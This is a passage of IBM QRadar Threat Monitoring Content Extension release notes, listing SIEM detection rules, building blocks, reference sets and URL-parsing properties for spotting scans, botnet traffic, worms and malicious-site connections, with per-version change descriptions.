Building Block | BB:Threats: Suspicious IP Protocol Usage: Suspicious ICMP Type Code | Identifies ICMP flows with suspicious Internet Control Message Protocol (ICMP) type codes. |
Building Block | BB:Threats: Suspicious IP Protocol Usage: TCP or UDP Port 0 | Identifies suspicious flows that use port 0. |
Building Block | BB:HostDefinition:Proxy Servers | Edit this building block to define typical proxy servers. Used with the BB:False Positive: Proxy Server False Positives Categories and BB:FalsePositve: Proxy Server False Positive Events building blocks. |
Building Block | BB:CategoryDefinition: Firewall or ACL Accept Event for a FW/Router/Switch Device | Defines firewall or ACL Accept events from firewall, router, and switch devices. |
Building Block | BB:DeviceDefinition: AV/AM | Defines all anti-virus (AV) and anti-malware (AM) on the system. |
Building Block | BB:DeviceDefinition: Proxy | Defines all proxy sources on the system. |
Building Block | BB:DeviceDefinition: FW / Router / Switch | Defines all firewalls, routers, and switches on the system. |
Building Block | BB:CategoryDefinition: Worm Events | Edit this building block to define worm events. This building block only applies to events that are not detected by a custom rule. |
Building Block | BB:CategoryDefinition: Unidirectional Flow SRC | |
Building Block | BB:Flowshape: Outbound Only | Matches flows that are outbound only. |
Building Block | BB:CategoryDefinition: Recon Event Categories | Edit this building block to include all events that indicate reconnaissance activity. |
Building Block | BB:CategoryDefinition: Suspicious Event Categories | Edit this building block to include all events that indicate suspicious activity. |
Building Block | BB:Threats: Scanning: ICMP Scan Low | Identifies a low level of ICMP reconnaissance. |
Building Block | BB:Threats: Suspicious IP Protocol Usage: Zero Payload Bidirectional Flows | Identifies bidirectional traffic that doesn't include payload. |
Building Block | BB:Threats: Scanning: Scan High | Identifies a high level of potential reconnaissance. |
Building Block | BB:CategoryDefinition: Unidirectional Flow | |
Building Block | BB:Threats: Suspicious IP Protocol Usage: Unidirectional ICMP Replys | Identifies traffic where ICMP replies are seen with no request. |
Building Block | BB:Threats: Suspicious IP Protocol Usage: Unidirectional ICMP Flows | Identifies unidirectional ICMP flows. |
Building Block | BB:Flowshape: Inbound Only | Matches flows that are inbound only. |
Building Block | BB:CategoryDefinition: Recon Flows | Edit this building block to include all events that indicate suspicious activity. |
Building Block | BB:Threats: Port Scans: UDP Port Scan | Identifies UDP based port scans. |
Building Block | BB:Threats: Scanning: ICMP Scan Medium | Identifies a medium level of ICMP reconnaissance. |
Building Block | BB:Threats: Scanning: Empty Responsive Flows Low | Detects potential reconnaissance activity where the source packet count is greater than 500. |
Building Block | BB:CategoryDefinition: Suspicious Flows | Edit this building block to include all events that indicate suspicious activity. |
Building Block | BB:CategoryDefinition: Suspicious Events | Edit this building block to include all events that indicate suspicious activity. |
Building Block | BB:Threats: Suspicious IP Protocol Usage: Long Duration Outbound Flow | Identifies flows that have been active for more than 48 hours. |
Building Block | BB:Threats: Scanning: Empty Responsive Flows Medium | Detects potential reconnaissance activity where the source packet count is greater than 5,000. |
Building Block | BB:Threats: Suspicious IP Protocol Usage: Large ICMP Packets | Identifies flows with abnormally large ICMP packets. |
Building Block | BB:Threats: Scanning: ICMP Scan High | Identifies a high level of ICMP reconnaissance. |
Building Block | BB:Threats: Port Scans: Host Scans | Identifies potential reconnaissance by flows. |
Building Block | BB:Threats: Scanning: Scan Medium | Identifies a medium level of potential reconnaissance. |
Building Block | BB:Threats: Scanning: Scan Low | Identifies a low level of potential reconnaissance. |
Building Block | BB:CategoryDefinition: Recon Events | Edit this building block to include all events that indicate reconnaissance activity. |
Building Block | BB:Threats: Scanning: Potential Scan | Identifies potential reconnaissance by flows. |
Building Block | BB:CategoryDefinition: Unidirectional Flow DST | |
Building Block | BB:Threats: Suspicious IP Protocol Usage:Unidirectional TCP Flows | Identifies unidirectional TCP flows. |
Building Block | BB:CategoryDefinition: Mail Policy Violation | Edit this building block to include anything you consider to be a mail based policy violation. For example, outbound traffic on port 25 not originating from a mail server. |
Building Block | BB:Threats: Scanning: Empty Responsive Flows High | Detects potential reconnaissance activity where the source packet count is greater than 100,000. |
Building Block | BB:Threats: Suspicious IP Protocol Usage: Large DNS Packets | Identifies flows with abnormally large DNS packets. |
Building Block | BB:Threats: Suspicious IP Protocol Usage:Unidirectional UDP and Misc Flows | Identifies unidirectional UDP and other miscellaneous flows. |
Rule | Remote Proxy or Anonymization Service (Inbound) |
|
Rule | Remote Proxy or Anonymization Service (Outbound) |
|
Rule | WormDetection: Successful Connections to the Internet on Common Worm Ports | Updated a rule test to remove two building blocks and use a new one to validate against
successful connections only:
|
Rule | Successful Inbound Connection from a Known Botnet CandC | Rule conditions updated to filter events/flows correctly. |
Rule | Communication with a web site that has been involved in previous SQL injection | Rule renamed (used to be siterather than web site.) |
Rule | Communication with a web site that is listed on a know blacklist or uses fast flux | Rule renamed (used to be siterather than web site.) |
Rule | Chained Exploit Followed by Suspicious Events on Third Host | Reports an exploit or attack type activity from the same source IP followed by suspicious
account activity from the same destination IP as the original event within 15 minutes, if the source
IP is not equal to the destination IP. This rule is disabled by default because it is intended as an alternative to the Chained Exploit Followed by Suspicious Events rule that ignores events with the same source and destination IP. |
Rule | Multiple Threats Detected on Same Host | Indicates that multiple threats are detected on the same host. |
Rule | Same Threat Detected on Multiple Hosts | Indicates that the same threat is detected on multiple hosts that are not servers. |
Rule | Same Threat Detected on Multiple Servers | Indicates that the same threat is detected on multiple hosts that are servers. |
Rule | Same Threat Detected on Same Host | Indicates that the same threat is detected on the same host. This might indicate that the AV is cleaning a file that is generated by the threat and not the threat itself. The time window should be large enough to cover at least two cycles of checks made by the AV. |
Rule | Same Threat Detected on Same Network Different Hosts | Indicates that the same threat is detected on different hosts in the same network hierarchy. |
Rule | Failed Communication to a Malicious Website | Alerts when a failed communication to a malicious website is made. |
Rule | Successful Communication to a Malicious Website | Alerts when a successful communication to a malicious website is made. |
The following table shows the reference data that is updated in IBM Security QRadar Threat Monitoring Content Extension 1.1.0.
Type | Name | Description |
---|---|---|
Reference Set | Malicious Web Categories | Defines malicious web categories. It is prepopulated with seven malicious web categories. |
IBM Security QRadar Threat Monitoring Content Extension 1.0.3
The following table shows the rules that are updated in IBM Security QRadar Threat Monitoring Content Extension 1.0.3.
Type | Name | Change description |
---|---|---|
Rule | Successful Inbound Connection from a Known Botnet Command and Control | Updated a rule test to change an 'any' value to 'all'. Administrators who modified this rule
need to review their rule tests to determine that the all value is set:
|
IBM Security QRadar Threat Monitoring Content Extension 1.0.2
The following table shows the building blocks that are updated in IBM Security QRadar Threat Monitoring Content Extension 1.0.2.
Type | Name | Change description |
---|---|---|
Building Block | BB:Suspicious: Remote: Unidirectional UDP or Misc Flows | Updated the last rule test of the remote flows BB to use one of the following tests:
|
Building Block | BB:Suspicious: Local: Unidirectional UDP or Misc Flows | Updated the last rule test of the local flows BB to use on of the following tests:
|
IBM Security QRadar Threat Monitoring Content Extension 1.0.1
The following table shows the building blocks that are updated in IBM Security QRadar Threat Monitoring Content Extension 1.0.1.
Type | Description | Change description |
---|---|---|
Rule | Botnet: Potential Botnet Connection (DNS) | Added a rule test:
|
Rule | WormDetection: Successful Connections to the internet on Common Worm Ports | Added a rule test:
|
Rule | Botnet: Successful Inbound Connection from a Known Botnet Command and Control | Added a rule test:
|
Building Block | BB:DeviceDefinition: FW / Router / Switch | No updates. Dependent on another rule and must be included in the extension framework. |
Building Block | BB:CategoryDefinition: Pre DMZ Jump | No updates. Dependent on another rule and must be included in the extension framework. |
Building Block | BB:CategoryDefinition: Post DMZ Jump | No updates. Dependent on another rule and must be included in the extension framework. |
IBM Security QRadar Threat Monitoring Content Extension 1.0.0
The Threat Theme extension adds 2 custom event properties for identifying URLs, 10 reference sets, 58 threat-related rules, and 56 building blocks for a total of 126 content add-ons for QRadar. This extension / content pack is required for any administrators with X-Force Premium IP Reputation Feeds enabled on their IBM QRadar SIEM appliances. The installation of this content adds required X-Force rules that work with the reputation feeds from the IBM X-Force Exchange.Custom event properties added by the threat extension
Name | Regex |
---|---|
URL | \(URL=(.*?)\) |
URL | (?:cs-uri=| )(?:http|ftp|tcp|https):\/\/(.+?)\s |
Name | Type |
---|---|
DNS Servers | Reference set |
Database Servers | Reference set |
DHCP Servers | Reference set |
FTP Servers | Reference set |
LDAP Servers | Reference set |
Mail Servers | Reference set |
Proxy Servers | Reference set |
SSH Servers | Reference set |
Web Servers | Reference set |
Windows Servers | Reference set |
Name | Category |
---|---|
X-Force Premium: Internal Host Communication with Malware URL | Threats (X-Force) |
X-Force Premium: Internal Connection to Host Categorized as Malware | Threats (X-Force) |
X-Force Premium: Internal Host Communicating with Botnet Command and Control URL | Threats (X-Force) |
X-Force Premium: Internal Hosts Communicating with Host Categorized as Anonymizers | Threats (X-Force) |
X-Force Premium: Servers Communicating with External IP Classified as Dynamic | Threats (X-Force) |
X-Force Premium: Non-Servers Communicating with External IP Classified as Dynamic | Threats (X-Force) |
X-Force Premium: Non-Mail Server Sending Mail to Servers Categorized as SPAM | Threats (X-Force) |
X-Force Premium: Mail Server Sending Mail to Servers Categorized as SPAM | Threats (X-Force) |
Local Mass Mailing Host Detected | Post-Intrusion Activity |
Remote: Client Based DNS Activity to the Internet | Post-Intrusion Activity |
Possible Local Worm Detected | Post-Intrusion Activity |
Local: Hidden FTP Server | Post-Intrusion Activity |
Local: SSH or Telnet Detected on Non-Standard Port | Post-Intrusion Activity |
Successful Connections to the Internet on Common Worm Ports | Post-Intrusion Activity |
Worm Detected (Events) | Post-Intrusion Activity |
Local Host Sending Malware | Malware |
Remote: IRC Connections | Compliance |
Remote: IM/Chat | Compliance |
Remote: Local P2P Server Detected | Compliance |
Remote: Usenet Usage | Compliance |
Remote: SSH or Telnet Detected on Non-Standard Port | Compliance |
Remote: Local P2P Client Detected | Compliance |
Remote: Local P2P Client Connected to more than 100 Servers | Compliance |
Remote: Local P2P Server connected to more than 100 Clients | Compliance |
Remote: Hidden FTP Server | Compliance |
Communication with a website known to be involved in botnet activity | Threats |
Local: Hidden FTP Server | Threats |
Local: SSH or Telnet Detected on Non-Standard Port | Threats |
Remote: Local P2P Client Detected | Threats |
Connection to a Remote Proxy or Anonymization Service (Outbound) | Threats |
Communication with a website known to be associated with the Russian business network | Threats |
Communication with a website known to aid in distribution of malware | Threats |
Potential Botnet Connection (DNS) | Threats |
Remote: IM/Chat | Threats |
Potential Botnet Events Become Offenses | Threats |
Remote: Hidden FTP Server | Threats |
Potential Honeypot Access | Threats |
Successful Inbound Connection from a Known Botnet CandC | Threats |
Remote: Local P2P Server Detected | Threats |
Remote: Local P2P Server connected to more than 100 Clients | Threats |
Remote: SMTP Mail Sender | Threats |
Remote: SSH or Telnet Detected on Non-Standard Port | Threats |
Communication with a site that has been involved in previous SQL injection | Threats |
Potential Connection to a Known Botnet CandC | Threats |
Local host on Botnet CandC List (SRC) | Threats |
Local host on Botnet CandC List (DST) | Threats |
Communication with a website known to be delivering code which may be a trojan | Threats |
Communication with a website known to be a phishing or fraud site | Threats |
Communication with a site that is listed on a known blacklist or uses fast flux | Threats |
Connection to a Remote Proxy or Anonymization Service (Inbound) | Threats |
Remote: Local P2P Client Connected to more than 100 Servers | Threats |
Remote: IRC Connections | Botnet |
Potential Botnet Connection (DNS) | Botnet |
Potential Botnet Events Become Offenses | Botnet |
Successful Inbound Connection from a Known Botnet CandC | Botnet |
Potential Connection to a Known Botnet CandC | Botnet |
Local host on Botnet CandC List (SRC) | Botnet |
Local host on Botnet CandC List (DST) | Botnet |
Name | Category |
---|---|
BB:ProtocolDefinition: Windows Protocols | Port\Protocol Definition |
BB:PortDefinition: Database Ports | Port\Protocol Definition |
BB:PortDefinition: FTP Ports | Port\Protocol Definition |
BB:PortDefinition: IRC Ports | Port\Protocol Definition |
BB:PortDefinition: Windows Ports | Port\Protocol Definition |
BB:PortDefinition: SNMP Ports | Port\Protocol Definition |
BB:PortDefinition: RPC Ports | Port\Protocol Definition |
BB:PortDefinition: Syslog Ports | Port\Protocol Definition |
BB:PortDefinition: SSH Ports | Port\Protocol Definition |
BB:PortDefinition: LDAP Ports | Port\Protocol Definition |
BB:PortDefinition: Mail Ports | Port\Protocol Definition |
BB:PortDefinition: DNS Ports | Port\Protocol Definition |
BB:PortDefinition: DHCP Ports | Port\Protocol Definition |
BB:PortDefinition: Web Ports | Port\Protocol Definition |
BB:PortDefinition: Common Worm Ports | Port\Protocol Definition |
BB:HostReference: LDAP Servers | Host Definitions |
BB:HostDefinition: Virus Definition and Other Update Servers | Host Definitions |
BB:HostDefinition: FTP Servers | Host Definitions |
BB:HostDefinition: DMZ Assets | Host Definitions |
BB:HostReference: Web Servers | Host Definitions |
BB:HostDefinition: Windows Servers | Host Definitions |
BB:HostDefinition: Servers | Host Definitions |
BB:HostReference: FTP Servers | Host Definitions |
BB:HostDefinition: SSH Servers | Host Definitions |
BB:HostDefinition: Database Servers | Host Definitions |
BB:HostDefinition: LDAP Servers | Host Definitions |
BB:HostDefinition: Web Servers | Host Definitions |
BB:HostDefinition: Syslog Servers and Senders | Host Definitions |
BB:HostDefinition: Mail Servers | Host Definitions |
BB:HostDefinition: DNS Servers | Host Definitions |
BB:HostReference: Windows Servers | Host Definitions |
BB:HostDefinition: VoIP PBX Server | Host Definitions |
BB:HostReference: DNS Servers | Host Definitions |
BB:HostReference: Database Servers | Host Definitions |
BB:HostDefinition: RPC Servers | Host Definitions |
BB:HostReference: SSH Servers | Host Definitions |
BB:HostReference: Mail Servers | Host Definitions |
BB:HostDefinition: Network Management Servers | Host Definitions |
BB:HostDefinition: DHCP Servers | Host Definitions |
BB:HostDefinition: Proxy Servers | Host Definitions |
BB:HostReference: Proxy Servers | Host Definitions |
BB:HostDefinition: SNMP Sender or Receiver | Host Definitions |
BB:HostReference: DHCP Servers | Host Definitions |
BB:Policy Violation: IRC IM Policy Violation: IRC Connection to Internet | Policy |
BB:Policy Violation: Mail Policy Violation: Outbound Mail Sender | Policy |
BB:Policy Violation: IRC IM Policy Violation: IM Communications | Policy |
BB:Policy Violation: Application Policy Violation: NNTP to Internet | Policy |
BB:CategoryDefinition: IRC Detection based on Firewall Events | Category Definitions |
BB:CategoryDefinition: Firewall or ACL Accept | Category Definitions |
BB:CategoryDefinition: Any Flow | Category Definitions |
BB:CategoryDefinition: Successful Communication | Category Definitions |
BB:CategoryDefinition: IRC Detected based on Event Category | Category Definitions |
BB:CategoryDefinition: IRC Detected based on Application | Category Definitions |
BB:CategoryDefinition: Firewall or ACL Denies | Category Definitions |
BB:Suspicious: Remote: Unidirectional UDP or Misc Flows | Category Definitions |
BB:Suspicious: Local: Unidirectional UDP or Misc Flows | Category Definitions |
BB:NetworkDefinition: Honeypot like Addresses | Network Definition |
BB:Threats: DoS: Potential Multihost Attack | Threats |